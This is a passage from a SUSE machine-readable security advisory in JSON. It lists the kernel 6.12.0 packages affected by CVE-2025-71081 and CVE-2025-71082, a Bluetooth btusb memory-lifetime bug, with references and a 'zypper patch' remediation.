"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
